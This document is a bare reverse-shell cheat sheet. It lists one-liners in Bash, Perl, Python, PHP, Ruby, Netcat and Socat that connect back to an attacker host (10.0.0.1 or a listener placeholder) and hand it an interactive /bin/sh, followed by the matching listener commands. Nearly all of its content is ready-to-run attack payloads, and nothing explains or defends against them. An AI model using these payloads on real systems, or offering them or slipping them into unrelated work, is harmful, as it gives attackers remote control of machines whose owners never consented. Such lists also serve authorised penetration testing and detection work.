
# Bash
- bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

# Perl
- perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

# Python
- python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

# Php
- php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

# Ruby
- ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

# Netcat
- nc -e /bin/sh 10.0.0.1 1234

# Socat
 * Listener:
 - socat file:`tty`,raw,echo=0 tcp-listen:12345
 
 * Victim:
 - socat exec:’bash -li’,pty,stderr,setsid,sigint,sane tcp:IP_LISTENER:12345


 ## Basic Server Listener ##
 nc -l [port]